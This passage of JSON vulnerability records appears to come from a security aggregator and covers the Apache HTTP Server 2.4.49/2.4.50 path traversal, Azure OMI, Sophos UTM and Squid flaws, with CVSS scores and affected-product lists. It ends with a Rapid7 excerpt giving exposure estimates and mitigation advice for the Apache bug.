"HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": 
"2021-11-03T00:00:00", "type": "cisa_kev", "title": "Microsoft Azure Open Management Infrastructure (OMI) Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-38647"], "modified": "2021-11-03T00:00:00", "id": "CISA-KEV-CVE-2021-38647", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-10T17:26:47", "description": "Apache HTTP server vulnerabilities allow an attacker to use a path traversal attack to map URLs to files outside the expected document root and perform Remote Code Execution.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-03T00:00:00", "type": "cisa_kev", "title": "Apache HTTP Server 2.4.49 and 2.4.50 Path Traversal", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", 
"version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-42013"], "modified": "2021-11-03T00:00:00", "id": "CISA-KEV-CVE-2021-42013", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "osv": [{"lastseen": "2022-10-05T20:51:36", "description": "It was found that the fix for CVE-2021-41773 in Apache HTTP Server 2.4.50 was insufficient. An attacker could use a path traversal attack to map URLs to files outside the directories configured by Alias-like directives. If files outside of these directories are not protected by the usual default configuration \"require all denied\", these requests can succeed. If CGI scripts are also enabled for these aliased pathes, this could allow for remote code execution. This issue only affects Apache 2.4.49 and Apache 2.4.50 and not earlier versions.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2021-10-07T16:15:00", "type": "osv", "title": "CVE-2021-42013", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", 
"CVE-2021-42013"], "modified": "2022-10-05T18:14:00", "id": "OSV:CVE-2021-42013", "href": "https://osv.dev/vulnerability/CVE-2021-42013", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-11-16T00:20:01", "description": "A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49. An attacker could use a path traversal attack to map URLs to files outside the directories configured by Alias-like directives. If files outside of these directories are not protected by the usual default configuration \"require all denied\", these requests can succeed. If CGI scripts are also enabled for these aliased pathes, this could allow for remote code execution. This issue is known to be exploited in the wild. This issue only affects Apache 2.4.49 and not earlier versions. The fix in Apache HTTP Server 2.4.50 was found to be incomplete, see CVE-2021-42013.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-05T09:15:00", "type": "osv", "title": "CVE-2021-41773", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], 
"modified": "2022-11-16T00:19:58", "id": "OSV:CVE-2021-41773", "href": "https://osv.dev/vulnerability/CVE-2021-41773", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-05T05:19:09", "description": "\nSeveral vulnerabilities were discovered in Squid, a proxy caching\nserver.\n\n\n* [CVE-2021-28651](https://security-tracker.debian.org/tracker/CVE-2021-28651)\nDue to a buffer-management bug, it allows a denial of service.\n When resolving a request with the urn: scheme, the parser leaks a\n small amount of memory. However, there is an unspecified attack\n methodology that can easily trigger a large amount of memory\n consumption.\n* [CVE-2021-28652](https://security-tracker.debian.org/tracker/CVE-2021-28652)\nDue to incorrect parser validation, it allows a Denial of Service\n attack against the Cache Manager API. This allows a trusted client\n to trigger memory leaks that. over time, lead to a Denial of\n Service via an unspecified short query string. This attack is\n limited to clients with Cache Manager API access privilege.\n* [CVE-2021-31806](https://security-tracker.debian.org/tracker/CVE-2021-31806)\nDue to a memory-management bug, it is vulnerable to a Denial of\n Service attack (against all clients using the proxy) via HTTP\n Range request processing.\n* [CVE-2021-31807](https://security-tracker.debian.org/tracker/CVE-2021-31807)\nAn integer overflow problem allows a remote server to achieve\n Denial of Service when delivering responses to HTTP Range\n requests. The issue trigger is a header that can be expected to\n exist in HTTP traffic without any malicious intent.\n* [CVE-2021-31808](https://security-tracker.debian.org/tracker/CVE-2021-31808)\nDue to an input-validation bug, it is vulnerable to a Denial of\n Service attack (against all clients using the proxy). 
A client\n sends an HTTP Range request to trigger this.\n* [CVE-2021-33620](https://security-tracker.debian.org/tracker/CVE-2021-33620)\nRemote servers to cause a denial of service (affecting\n availability to all clients) via an HTTP response. The issue\n trigger is a header that can be expected to exist in HTTP traffic\n without any malicious intent by the server.\n\n\nFor Debian 9 stretch, these problems have been fixed in version\n3.5.23-5+deb9u7.\n\n\nWe recommend that you upgrade your squid3 packages.\n\n\nFor the detailed security status of squid3 please refer to\nits security tracker page at:\n<https://security-tracker.debian.org/tracker/squid3>\n\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: <https://wiki.debian.org/LTS>\n\n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2021-06-28T00:00:00", "type": "osv", "title": "squid3 - security update", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31806", "CVE-2021-31808", "CVE-2021-28651", "CVE-2021-28652", "CVE-2021-31807", 
"CVE-2021-33620"], "modified": "2022-08-05T05:19:08", "id": "OSV:DLA-2685-1", "href": "https://osv.dev/vulnerability/DLA-2685-1", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "cve": [{"lastseen": "2023-02-09T14:32:44", "description": "A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49. An attacker could use a path traversal attack to map URLs to files outside the directories configured by Alias-like directives. If files outside of these directories are not protected by the usual default configuration \"require all denied\", these requests can succeed. If CGI scripts are also enabled for these aliased pathes, this could allow for remote code execution. This issue is known to be exploited in the wild. This issue only affects Apache 2.4.49 and not earlier versions. The fix in Apache HTTP Server 2.4.50 was found to be incomplete, see CVE-2021-42013.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-10-05T09:15:00", "type": "cve", "title": "CVE-2021-41773", "cwe": ["CWE-22"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", 
"CVE-2021-42013"], "modified": "2022-10-28T16:16:00", "cpe": ["cpe:/o:fedoraproject:fedora:34", "cpe:/a:apache:http_server:2.4.49", "cpe:/a:oracle:instantis_enterprisetrack:17.3", "cpe:/a:netapp:cloud_backup:-", "cpe:/a:oracle:instantis_enterprisetrack:17.2", "cpe:/a:oracle:instantis_enterprisetrack:17.1", "cpe:/o:fedoraproject:fedora:35"], "id": "CVE-2021-41773", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-41773", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:a:oracle:instantis_enterprisetrack:17.3:*:*:*:*:*:*:*", "cpe:2.3:o:fedoraproject:fedora:34:*:*:*:*:*:*:*", "cpe:2.3:o:fedoraproject:fedora:35:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:instantis_enterprisetrack:17.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.4.49:*:*:*:*:*:*:*", "cpe:2.3:a:netapp:cloud_backup:-:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:instantis_enterprisetrack:17.2:*:*:*:*:*:*:*"]}, {"lastseen": "2023-02-09T14:33:01", "description": "It was found that the fix for CVE-2021-41773 in Apache HTTP Server 2.4.50 was insufficient. An attacker could use a path traversal attack to map URLs to files outside the directories configured by Alias-like directives. If files outside of these directories are not protected by the usual default configuration \"require all denied\", these requests can succeed. If CGI scripts are also enabled for these aliased pathes, this could allow for remote code execution. 
This issue only affects Apache 2.4.49 and Apache 2.4.50 and not earlier versions.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-07T16:15:00", "type": "cve", "title": "CVE-2021-42013", "cwe": ["CWE-22"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2022-10-05T18:14:00", "cpe": ["cpe:/o:fedoraproject:fedora:34", "cpe:/a:apache:http_server:2.4.49", "cpe:/a:oracle:instantis_enterprisetrack:17.3", "cpe:/a:netapp:cloud_backup:-", "cpe:/a:apache:http_server:2.4.50", "cpe:/a:oracle:instantis_enterprisetrack:17.2", "cpe:/a:oracle:instantis_enterprisetrack:17.1", "cpe:/o:fedoraproject:fedora:35"], "id": "CVE-2021-42013", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-42013", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:oracle:instantis_enterprisetrack:17.3:*:*:*:*:*:*:*", "cpe:2.3:o:fedoraproject:fedora:34:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.4.50:*:*:*:*:*:*:*", "cpe:2.3:o:fedoraproject:fedora:35:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:instantis_enterprisetrack:17.1:*:*:*:*:*:*:*", 
"cpe:2.3:a:apache:http_server:2.4.49:*:*:*:*:*:*:*", "cpe:2.3:a:netapp:cloud_backup:-:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:instantis_enterprisetrack:17.2:*:*:*:*:*:*:*"]}, {"lastseen": "2023-02-09T15:14:17", "description": "A remote code execution vulnerability exists in the WebAdmin of Sophos SG UTM before v9.705 MR5, v9.607 MR7, and v9.511 MR11", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-09-25T04:23:00", "type": "cve", "title": "CVE-2020-25223", "cwe": ["CWE-78"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-25223"], "modified": "2022-10-05T18:28:00", "cpe": ["cpe:/a:sophos:unified_threat_management:9.511", "cpe:/a:sophos:unified_threat_management:9.705", "cpe:/a:sophos:unified_threat_management:9.607"], "id": "CVE-2020-25223", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-25223", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:sophos:unified_threat_management:9.511:-:*:*:*:*:*:*", "cpe:2.3:a:sophos:unified_threat_management:9.705:-:*:*:*:*:*:*", "cpe:2.3:a:sophos:unified_threat_management:9.607:-:*:*:*:*:*:*"]}, 
{"lastseen": "2023-02-09T14:20:49", "description": "An issue was discovered in Squid before 4.15 and 5.x before 5.0.6. An integer overflow problem allows a remote server to achieve Denial of Service when delivering responses to HTTP Range requests. The issue trigger is a header that can be expected to exist in HTTP traffic without any malicious intent.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-06-08T20:15:00", "type": "cve", "title": "CVE-2021-31807", "cwe": ["CWE-190"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31807"], "modified": "2021-09-14T14:31:00", "cpe": ["cpe:/o:fedoraproject:fedora:34", "cpe:/a:netapp:cloud_manager:-", "cpe:/a:squid-cache:squid:2.5.stable5", "cpe:/a:squid-cache:squid:2.5.stable7", "cpe:/a:squid-cache:squid:2.6", "cpe:/a:squid-cache:squid:2.5.stable2", "cpe:/a:squid-cache:squid:2.5.stable3", "cpe:/a:squid-cache:squid:2.5.stable6", "cpe:/a:squid-cache:squid:2.5.stable13", "cpe:/a:squid-cache:squid:2.5.stable14", "cpe:/a:squid-cache:squid:2.7", "cpe:/a:squid-cache:squid:2.5.stable4", "cpe:/a:squid-cache:squid:2.5.stable11", 
"cpe:/a:squid-cache:squid:2.5.stable12", "cpe:/o:fedoraproject:fedora:33", "cpe:/a:squid-cache:squid:2.5.stable9", "cpe:/a:squid-cache:squid:2.5.stable8", "cpe:/a:squid-cache:squid:2.5.stable10"], "id": "CVE-2021-31807", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-31807", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:a:squid-cache:squid:2.5.stable14:*:*:*:*:*:*:*", "cpe:2.3:a:squid-cache:squid:2.6:*:*:*:*:*:*:*", "cpe:2.3:a:squid-cache:squid:2.5.stable3:*:*:*:*:*:*:*", "cpe:2.3:a:squid-cache:squid:2.7:stable7:*:*:*:*:*:*", "cpe:2.3:a:squid-cache:squid:2.5.stable8:*:*:*:*:*:*:*", "cpe:2.3:a:squid-cache:squid:2.7:stable5:*:*:*:*:*:*", "cpe:2.3:a:netapp:cloud_manager:-:*:*:*:*:*:*:*", "cpe:2.3:a:squid-cache:squid:2.5.stable13:*:*:*:*:*:*:*", "cpe:2.3:a:squid-cache:squid:2.5.stable5:*:*:*:*:*:*:*", "cpe:2.3:a:squid-cache:squid:2.5.stable4:*:*:*:*:*:*:*", "cpe:2.3:a:squid-cache:squid:2.5.stable12:*:*:*:*:*:*:*", "cpe:2.3:a:squid-cache:squid:2.5.stable6:*:*:*:*:*:*:*", "cpe:2.3:a:squid-cache:squid:2.5.stable10:*:*:*:*:*:*:*", "cpe:2.3:a:squid-cache:squid:2.7:stable2:*:*:*:*:*:*", "cpe:2.3:a:squid-cache:squid:2.5.stable2:*:*:*:*:*:*:*", "cpe:2.3:o:fedoraproject:fedora:33:*:*:*:*:*:*:*", "cpe:2.3:a:squid-cache:squid:2.5.stable7:*:*:*:*:*:*:*", "cpe:2.3:a:squid-cache:squid:2.7:stable4:*:*:*:*:*:*", "cpe:2.3:a:squid-cache:squid:2.5.stable11:*:*:*:*:*:*:*", "cpe:2.3:a:squid-cache:squid:2.7:stable9:*:*:*:*:*:*", "cpe:2.3:o:fedoraproject:fedora:34:*:*:*:*:*:*:*", "cpe:2.3:a:squid-cache:squid:2.7:stable8:*:*:*:*:*:*", "cpe:2.3:a:squid-cache:squid:2.7:stable6:*:*:*:*:*:*", "cpe:2.3:a:squid-cache:squid:2.7:-:*:*:*:*:*:*", "cpe:2.3:a:squid-cache:squid:2.7:stable3:*:*:*:*:*:*", "cpe:2.3:a:squid-cache:squid:2.5.stable9:*:*:*:*:*:*:*"]}, {"lastseen": "2023-02-09T14:20:50", "description": "An issue was discovered in Squid before 4.15 and 5.x before 5.0.6. 
Due to a memory-management bug, it is vulnerable to a Denial of Service attack (against all clients using the proxy) via HTTP Range request processing.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-05-27T13:15:00", "type": "cve", "title": "CVE-2021-31806", "cwe": ["CWE-116"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31806"], "modified": "2021-09-14T17:37:00", "cpe": ["cpe:/o:debian:debian_linux:9.0", "cpe:/o:fedoraproject:fedora:34", "cpe:/a:netapp:cloud_manager:-", "cpe:/o:fedoraproject:fedora:33", "cpe:/o:debian:debian_linux:10.0"], "id": "CVE-2021-31806", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-31806", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:o:fedoraproject:fedora:34:*:*:*:*:*:*:*", "cpe:2.3:a:netapp:cloud_manager:-:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*", "cpe:2.3:o:fedoraproject:fedora:33:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*"]}, {"lastseen": "2023-02-09T14:28:44", "description": "Open Management Infrastructure Remote Code Execution Vulnerability", "cvss3": 
{"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-15T12:15:00", "type": "cve", "title": "CVE-2021-38647", "cwe": ["CWE-665"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-38647"], "modified": "2022-07-12T17:42:00", "cpe": ["cpe:/a:microsoft:azure_open_management_infrastructure:-", "cpe:/a:microsoft:log_analytics_agent:-", "cpe:/a:microsoft:container_monitoring_solution:-", "cpe:/a:microsoft:azure_stack_hub:-", "cpe:/a:microsoft:azure_automation_state_configuration:-", "cpe:/a:microsoft:azure_diagnostics_\\(lad\\):-", "cpe:/a:microsoft:azure_sentinel:-", "cpe:/a:microsoft:azure_security_center:-", "cpe:/a:microsoft:system_center_operations_manager:-", "cpe:/a:microsoft:azure_automation_update_management:-"], "id": "CVE-2021-38647", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-38647", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:microsoft:azure_sentinel:-:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:azure_automation_update_management:-:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:azure_automation_state_configuration:-:*:*:*:*:*:*:*", 
"cpe:2.3:a:microsoft:azure_security_center:-:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:system_center_operations_manager:-:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:azure_diagnostics_\\(lad\\):-:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:log_analytics_agent:-:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:azure_open_management_infrastructure:-:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:container_monitoring_solution:-:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:azure_stack_hub:-:*:*:*:*:*:*:*"]}], "rapid7blog": [{"lastseen": "2021-10-16T08:58:36", "description": "CVE | Vendor Advisory | AttackerKB | IVM Content | Patching Urgency | Last Update \n---|---|---|---|---|--- \nCVE-2021-41773, CVE-2021-42013 | [Apache Advisory](<https://httpd.apache.org/security/vulnerabilities_24.html>) | [AttackerKB](<https://attackerkb.com/topics/1RltOPCYqE/cve-2021-41773/rapid7-analysis?referrer=blog>) | Available | ASAP | October 12, 2021 15:00 ET \n \n\n\n_See the `Updates` section at the end of this post for information on developments that occurred after initial publication._\n\nOn Monday, October 4, 2021, Apache published [an advisory](<https://httpd.apache.org/security/vulnerabilities_24.html>) on [CVE-2021-41773](<https://attackerkb.com/topics/1RltOPCYqE/cve-2021-41773/rapid7-analysis?referrer=blog>), an unauthenticated remote file disclosure vulnerability in HTTP Server version 2.4.49 and 2.4.50 (see the `Updates` section for more on 2.4.50). The vulnerability arises from the mishandling of URL-encoded path traversal characters in the HTTP GET request. Public proof-of-concept exploit code is widely available, and Apache and others have noted that this vulnerability is being exploited in the wild. 
Note that a non-default configuration is required for exploitability.\n\nWhile the original advisory indicated that CVE-2021-41773 was merely an information disclosure bug, both [Rapid7](<https://attackerkb.com/topics/1RltOPCYqE/cve-2021-41773/rapid7-analysis?referrer=blog>) and [community](<https://twitter.com/hackerfantastic/status/1445529822071967745>) researchers have verified that the vulnerability can be used for remote code execution **when [mod_cgi](<https://httpd.apache.org/docs/current/mod/mod_cgi.html>) is enabled.** While mod_cgi is not enabled in the default Apache Server HTTP configuration, it\u2019s also not an uncommon feature to enable. With mod_cgi enabled, an attacker can execute arbitrary programs via HTTP POST requests. The initial RCE proof of concept resulted in blind command execution, and there have been multiple proofs of concept that coerce the HTTP server into sending the program\u2019s output back to the attacker. Rapid7\u2019s research team has a [full root cause analysis of CVE-2021-41773 here](<https://attackerkb.com/topics/1RltOPCYqE/cve-2021-41773/rapid7-analysis?referrer=blog>) along with proofs of concept.\n\nRapid7 Labs has identified roughly 65,000 potentially vulnerable versions of Apache httpd exposed to the public internet. Our exposure estimate intentionally does not count multiple Apache servers on the same IP as different instances (this would substantially increase the number of exposed instances identified as vulnerable).\n\n\n\n## Mitigation guidance\n\nOrganizations that are using Apache HTTP Server 2.4.49 or 2.4.50 should determine whether they are using vulnerable configurations. If a vulnerable server is discovered, the server\u2019s configuration file should be updated to include the filesystem directory directive with _require all denied_:\n \n \n <Directory />\n Require all denied\n </Directory>\n \n\nApache HTTP Server users should update to **2.4.51** or later as soon as is practical. 
